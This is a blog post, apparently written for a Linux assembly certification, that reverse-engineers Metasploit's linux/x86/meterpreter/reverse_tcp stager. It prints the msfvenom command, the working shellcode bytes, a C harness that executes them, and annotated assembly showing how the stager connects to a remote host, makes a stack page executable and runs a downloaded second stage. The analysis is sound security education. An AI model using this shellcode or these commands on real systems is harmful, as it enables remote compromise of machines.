Content
- Introduction
- Generate shellcode
- Compile POC and retrieve shellcode source
- Disassemble shellcode
- Analysis
1. Introduction
I’ve always been intrigued by the little intricacies of life that I do not fully understand.
Don’t get me wrong, I do like the magical feeling of surprise and I thoroughly appreciate the mystique. I do however have my reservations when it comes to shellcode that I haven’t written myself.
This reservation might stem from some kind of digital survival instinct (reinforced by the “OpenSSH <= 5.3 remote root 0day exploit”) or it might simply be my drive to keep learning. Whatever the reason, I wanted to know how the shellcode works that I’ve been using for a while to pop dozens of boxes: linux/x86/meterpreter/reverse_tcp
2. Generate shellcode
A few things to be aware of when dissecting msf payloads:
- the shellcodes will lack sections, thus the use of objdump will be limited. We could try forcing it to work via the following command but I decided against it:
objdump -b binary -D -m i386 <shellcode> -M intel
- piping the output from msfvenom to “ndisasm -u -” would produce assembly code in a weird dialect and that would confuse me.
I am going to create the raw shellcode to paste into our shellcode.c POC for further analysis:
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.100.15 LPORT=1337 -a x86 --platform Linux -f c
No encoder or badchars specified, outputting raw payload
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68\xc0\xa8\x64\x0f\x68\x02\x00\x05\x39\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1";
Let’s pop it into our POC:
#include <stdio.h>
#include <string.h>

unsigned char code[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68\xc0\xa8\x64\x0f\x68\x02\x00\x05\x39\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1";

int main(void)
{
    /* strlen() stops at the first null byte, so it can under-report the payload size */
    printf("Shellcode Length: %zu\n", strlen((const char *)code));

    /* treat the byte array as a function and jump into it */
    int (*ret)(void) = (int (*)(void))code;
    ret();
    return 0;
}
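One detail of the POC is easy to miss: strlen() stops counting at the first null byte, and this payload contains nulls (the port is pushed as 0x39050002, for example). The following Python sketch is not part of the original toolchain; it only reuses the bytes from the msfvenom output above to compare the real payload size with what strlen() would report. The helper name c_strlen is made up for this illustration.

```python
# Payload bytes copied from the msfvenom output above.
SHELLCODE = bytes.fromhex(
    "31dbf7e35343536a02b06689e1cd80"
    "975b68c0a8640f680200053989e16a"
    "665850515789e143cd80b207b90010"
    "000089e3c1eb0cc1e30cb07dcd805b"
    "89e199b60cb003cd80ffe1"
)


def c_strlen(buf: bytes) -> int:
    """Mimic C strlen(): count bytes up to (not including) the first null byte."""
    idx = buf.find(b"\x00")
    return len(buf) if idx == -1 else idx


if __name__ == "__main__":
    print("actual length:", len(SHELLCODE))       # 71
    print("strlen length:", c_strlen(SHELLCODE))  # 24
```

The 24 matches the "Shellcode Length" line printed in the gdb session below, while the payload itself is 71 bytes long, which agrees with the final jmp ecx sitting at offset +69 in the disassembly.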
3. Compile the shellcode POC and extract the shellcode source code
We know that it works so let’s jump right into it with gdb:
root@kali:~/# gdb -q shellcode
Reading symbols from /root/git/slae-assignment5/shellcode...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) break main
Breakpoint 1 at 0x804844f
(gdb) run
Starting program: /root/git/slae-assignment5/shellcode
warning: no loadable sections found in added symbol-file system-supplied DSO at 0xb7fe0000

Breakpoint 1, 0x0804844f in main ()
(gdb) disassemble
Dump of assembler code for function main:
   0x0804844c <+0>:     push   ebp
   0x0804844d <+1>:     mov    ebp,esp
=> 0x0804844f <+3>:     and    esp,0xfffffff0
   0x08048452 <+6>:     sub    esp,0x20
   0x08048455 <+9>:     mov    DWORD PTR [esp],0x8049700
   0x0804845c <+16>:    call   0x8048340 <strlen@plt>
   0x08048461 <+21>:    mov    DWORD PTR [esp+0x4],eax
   0x08048465 <+25>:    mov    DWORD PTR [esp],0x8048520
   0x0804846c <+32>:    call   0x8048320 <printf@plt>
   0x08048471 <+37>:    mov    DWORD PTR [esp+0x1c],0x8049700
   0x08048479 <+45>:    mov    eax,DWORD PTR [esp+0x1c]
   0x0804847d <+49>:    call   eax
   0x0804847f <+51>:    leave
   0x08048480 <+52>:    ret
End of assembler dump.
(gdb) break *0x0804847d
Breakpoint 2 at 0x804847d
(gdb) c
Continuing.
Shellcode Length: 24

Breakpoint 2, 0x0804847d in main ()
(gdb) stepi
0x08049700 in code ()
(gdb) disassemble
Dump of assembler code for function code:
=> 0x08049700 <+0>:     xor    ebx,ebx
   0x08049702 <+2>:     mul    ebx
   0x08049704 <+4>:     push   ebx
   0x08049705 <+5>:     inc    ebx
   0x08049706 <+6>:     push   ebx
   0x08049707 <+7>:     push   0x2
   0x08049709 <+9>:     mov    al,0x66
   0x0804970b <+11>:    mov    ecx,esp
   0x0804970d <+13>:    int    0x80
   0x0804970f <+15>:    xchg   edi,eax
   0x08049710 <+16>:    pop    ebx
   0x08049711 <+17>:    push   0xf64a8c0
   0x08049716 <+22>:    push   0x39050002
   0x0804971b <+27>:    mov    ecx,esp
   0x0804971d <+29>:    push   0x66
   0x0804971f <+31>:    pop    eax
   0x08049720 <+32>:    push   eax
   0x08049721 <+33>:    push   ecx
   0x08049722 <+34>:    push   edi
   0x08049723 <+35>:    mov    ecx,esp
   0x08049725 <+37>:    inc    ebx
   0x08049726 <+38>:    int    0x80
   0x08049728 <+40>:    mov    dl,0x7
   0x0804972a <+42>:    mov    ecx,0x1000
   0x0804972f <+47>:    mov    ebx,esp
   0x08049731 <+49>:    shr    ebx,0xc
   0x08049734 <+52>:    shl    ebx,0xc
   0x08049737 <+55>:    mov    al,0x7d
   0x08049739 <+57>:    int    0x80
   0x0804973b <+59>:    pop    ebx
   0x0804973c <+60>:    mov    ecx,esp
   0x0804973e <+62>:    cdq
   0x0804973f <+63>:    mov    dh,0xc
   0x08049741 <+65>:    mov    al,0x3
   0x08049743 <+67>:    int    0x80
   0x08049745 <+69>:    jmp    ecx
End of assembler dump.
(gdb)
And there is our meterpreter reverse shell in assembly.
4. Disassemble shellcode
I’m going to cut and paste it into its own source file for detailed analysis:
; Filename: msf-revshell.nasm
; Author: Re4son re4son [at] whitedome.com.au
; Website: http://www.whitedome.com.au/re4son
;
; Purpose: Disassembly of msf linux/x86/meterpreter/reverse_tcp
;          for research purpose

global _start

section .text

_start:
        xor ebx,ebx
        mul ebx
        push ebx
        inc ebx
        push ebx
        push 0x2
        mov al,0x66
        mov ecx,esp
        int 0x80
        xchg edi,eax
        pop ebx
        push 0xf64a8c0
        push 0x39050002
        mov ecx,esp
        push 0x66
        pop eax
        push eax
        push ecx
        push edi
        mov ecx,esp
        inc ebx
        int 0x80
        mov dl,0x7
        mov ecx,0x1000
        mov ebx,esp
        shr ebx,0xc
        shl ebx,0xc
        mov al,0x7d
        int 0x80
        pop ebx
        mov ecx,esp
        cdq
        mov dh,0xc
        mov al,0x3
        int 0x80
        jmp ecx
5. Analysis
In addition to this source file I am going to create a handy graphic representation of the program using libemu:
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.100.15 LPORT=1337 -a x86 --platform Linux | /usr/bin/sctest -vvv -Ss 100000 -G msf_rev_shell.dot
root@kali:~# dot msf_rev_shell.dot -Tpng -o msf_rev_shell.png
libemu choked a bit at the end but got us a nice result:
We can clearly see that our shellcode has four parts (the last one was omitted by libemu but can be seen in the assembly). The first two are pretty much a copy and paste of our reverse shell from the previous chapter:
1. Create a socket: We push our parameters (0, 1, 2) onto the stack, store their address in ecx, the socketcall sub function number 1 (socket) in ebx and the socketcall system call number 102 in eax, then execute int 0x80.
2. Connect: We push our IP address, port and socket structure attributes onto the stack, store the address in ecx, the connect sub function number (3) in ebx and the socketcall system call number 102 in eax, then execute int 0x80.
3. Mprotect: This is where it gets interesting. The last section in the graph sets up a system call with the number 125. According to our system call table, this call is mprotect, which sets protection on a region of memory according to man mprotect:
int mprotect(void *addr, size_t len, int prot);

mprotect() changes protection for the calling process's memory page(s) containing any part of the address range in the interval [addr, addr+len-1]. addr must be aligned to a page boundary.

If the calling process tries to access memory in a manner that violates the protection, then the kernel generates a SIGSEGV signal for the process.

prot is either PROT_NONE or a bitwise-or of the other values in the following list:

PROT_NONE  (0x0) The memory cannot be accessed at all.
PROT_READ  (0x1) The memory can be read.
PROT_WRITE (0x2) The memory can be modified.
PROT_EXEC  (0x4) The memory can be executed.
It seems that our shellcode prepares a chunk of the stack for storage and execution of our stage 2 shellcode, but let’s confirm that by analyzing the code step by step:
mov dl,0x7          ; set the permissions: read (1), write (2) and execute (4) flags in edx
mov ecx,0x1000      ; define the size of the region as 4096 bytes
mov ebx,esp         ; use the top of the stack as the start of the region
shr ebx,0xc         ; shift ebx 3 nibbles to the right to drop the 12 least significant bits
shl ebx,0xc         ; and shift 12 zeros back in, rounding ebx down to the page boundary (1348 bytes below esp in this run)
mov al,0x7d         ; move system call number 125 into al
int 0x80            ; invoke mprotect system call
Bingo. Let’s see where that puts our buffer in memory:
There it is, just underneath the stack: our 4k executable buffer for all the mischief that we have planned for later.
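The arithmetic behind the mprotect arguments can be checked with a short Python sketch. Only the flag values and the shift-by-12 logic come from the disassembly and the man page; the esp value is hypothetical and was picked so that it ends in 0x544, which reproduces the 1348-byte offset mentioned in the code comments.

```python
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
PAGE_SHIFT = 12  # shr/shl by 0xc corresponds to 4096-byte pages


def page_align_down(addr: int) -> int:
    """Equivalent of `shr ebx,0xc` followed by `shl ebx,0xc` on a 32-bit value."""
    return ((addr & 0xFFFFFFFF) >> PAGE_SHIFT) << PAGE_SHIFT


if __name__ == "__main__":
    esp = 0xBFFFF544  # hypothetical stack pointer, NOT taken from the original session
    start = page_align_down(esp)
    print(hex(start))       # 0xbffff000
    print(esp - start)      # 1348
    print(PROT_READ | PROT_WRITE | PROT_EXEC)  # 7, the value loaded into dl
```

The rounding is needed because mprotect requires addr to be page aligned; with a length of 0x1000 the call then covers exactly the page that contains esp.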
4. Read: The last section, which didn’t make it into our graph, sets up a system call with the number 3. According to our system call table, this call is read, which would make sense as our main purpose is to download the second stage of our shellcode.
According to man 2 read:
ssize_t read(int fd, void *buf, size_t count);

read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.
There we have it.
Let’s again confirm our theory by analyzing each step:
pop ebx             ; store our file descriptor in ebx (pushed during the connect() )
mov ecx,esp         ; store pointer to our (nicely prepared) buffer in ecx
cdq                 ; zero out edx (eax is 0 after a successful mprotect)
mov dh,0xc          ; set the size to 3072 bytes
mov al,0x3          ; move system call number 3 into al
int 0x80            ; invoke read system call
jmp ecx             ; redirect code execution to the downloaded shellcode
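The size calculation relies on a small trick: cdq copies the sign bit of eax into every bit of edx, so it only zeroes edx because eax holds 0 after a successful mprotect. The Python sketch below models just these two instructions; the function names are invented for the illustration and the failing eax value is a hypothetical example, not something observed in the original session.

```python
def cdq(eax: int) -> int:
    """Return edx after `cdq`: all ones if eax's sign bit is set, otherwise zero."""
    return 0xFFFFFFFF if eax & 0x80000000 else 0


def mov_dh(edx: int, value: int) -> int:
    """Return edx after `mov dh, value` (only bits 8..15 are replaced)."""
    return (edx & 0xFFFF00FF) | ((value & 0xFF) << 8)


if __name__ == "__main__":
    # eax = 0 after a successful mprotect: edx becomes 0x0c00
    print(mov_dh(cdq(0), 0x0C))                # 3072

    # hypothetical failure: eax holds a negative errno such as -13 (0xfffffff3)
    print(hex(mov_dh(cdq(0xFFFFFFF3), 0x0C)))  # 0xffff0cff
```

So the 3072-byte read size holds as long as the preceding mprotect call returned 0.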
Voila, it all makes perfect sense now:
; Filename: msf-revshell.nasm
; Author: Re4son re4son [at] whitedome.com.au
; Website: http://www.whitedome.com.au/re4son
;
; Purpose: Disassembly of msf linux/x86/meterpreter/reverse_tcp
;          for research purpose

global _start

section .text

_start:

        ; Create socket
        xor ebx,ebx         ; zero out ebx
        mul ebx             ; zero out eax & edx
        push ebx            ; push IPPROTO = 0
        inc ebx             ; ebx = 1, the socket sub function number
        push ebx            ; push SOCK_STREAM=1
        push 0x2            ; push AF_INET=2
        mov al,0x66         ; store sys_socketcall system call number in al
        mov ecx,esp         ; store pointer to arguments in ecx
        int 0x80            ; invoke system call
        xchg edi,eax        ; store the socket file descriptor in edi

        ; Connect
        pop ebx             ; pop the AF_INET value 2 (still on top of the stack) into ebx
        push 0xf64a8c0      ; push IP address 192.168.100.15
        push 0x39050002     ; push port 1337 (0x0539) and AF_INET (0x0002)
        mov ecx,esp         ; store pointer to the sockaddr structure in ecx
        push 0x66           ; push the sys_socketcall system call number
        pop eax             ; and pop it into eax
        push eax            ; reuse eax (102) as the address length argument
        push ecx            ; &serv_addr
        push edi            ; our socket descriptor
        mov ecx,esp         ; store pointer to arguments in ecx
        inc ebx             ; inc ebx from 2 to sub function number 3 for connect
        int 0x80            ; invoke system call

        ; Prepare buffer for incoming stage 2 shellcode
        mov dl,0x7          ; set the permissions: read (1), write (2) and execute (4) flags in edx
        mov ecx,0x1000      ; define the size of the region as 4096 bytes
        mov ebx,esp         ; use the top of the stack as the start of the region
        shr ebx,0xc         ; shift ebx 3 nibbles to the right to drop the 12 least significant bits
        shl ebx,0xc         ; and shift 12 zeros back in, rounding ebx down to the page boundary (1348 bytes below esp in this run)
        mov al,0x7d         ; move system call number 125 into al
        int 0x80            ; invoke mprotect system call

        ; Retrieve stage 2 shellcode
        pop ebx             ; store our file descriptor in ebx (pushed during the connect() )
        mov ecx,esp         ; store pointer to our (nicely prepared) buffer in ecx
        cdq                 ; zero out edx (eax is 0 after a successful mprotect)
        mov dh,0xc          ; set the size to 3072 bytes
        mov al,0x3          ; move system call number 3 into al
        int 0x80            ; invoke read system call
        jmp ecx             ; redirect code execution to the downloaded shellcode
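The connect stage can be double-checked with a short Python sketch. It rebuilds the sockaddr_in bytes from the two pushed immediates and traces ebx across the first two stages to see which socketcall sub function ends up selected. The function names are made up for this illustration; the constants SYS_SOCKET = 1 and SYS_CONNECT = 3 are the sub function numbers defined in linux/net.h.

```python
import socket
import struct

SYS_SOCKET, SYS_CONNECT = 1, 3  # socketcall sub function numbers (linux/net.h)


def decode_sockaddr(first_push: int, second_push: int):
    """Rebuild the 8 bytes left on the stack by two 32-bit pushes.

    The value pushed last sits at the lower address, so it comes first in memory.
    """
    raw = struct.pack("<II", second_push, first_push)
    family = struct.unpack_from("<H", raw, 0)[0]  # sin_family, host byte order
    port = struct.unpack_from(">H", raw, 2)[0]    # sin_port, network byte order
    addr = socket.inet_ntoa(raw[4:8])             # sin_addr, network byte order
    return family, port, addr


def ebx_before_connect() -> int:
    """Trace ebx from the socket stage up to the second int 0x80."""
    stack = []
    ebx = 0            # xor ebx,ebx
    stack.append(ebx)  # push ebx  (protocol 0)
    ebx += 1           # inc ebx   (SYS_SOCKET)
    stack.append(ebx)  # push ebx  (SOCK_STREAM)
    stack.append(2)    # push 0x2  (AF_INET)
    ebx = stack.pop()  # pop ebx   (takes the 2 back off the stack)
    ebx += 1           # inc ebx
    return ebx


if __name__ == "__main__":
    print(decode_sockaddr(0x0F64A8C0, 0x39050002))  # (2, 1337, '192.168.100.15')
    print(ebx_before_connect() == SYS_CONNECT)      # True
```

The decoded values match the LHOST and LPORT passed to msfvenom, and the trace shows that the pop ebx before the connect call picks up the leftover AF_INET value 2, which the later inc ebx turns into 3.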
Let’s make sure it all works as intended:
Perfect. Job well done.
All files are available on GitHub.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student-ID: SLAE – 674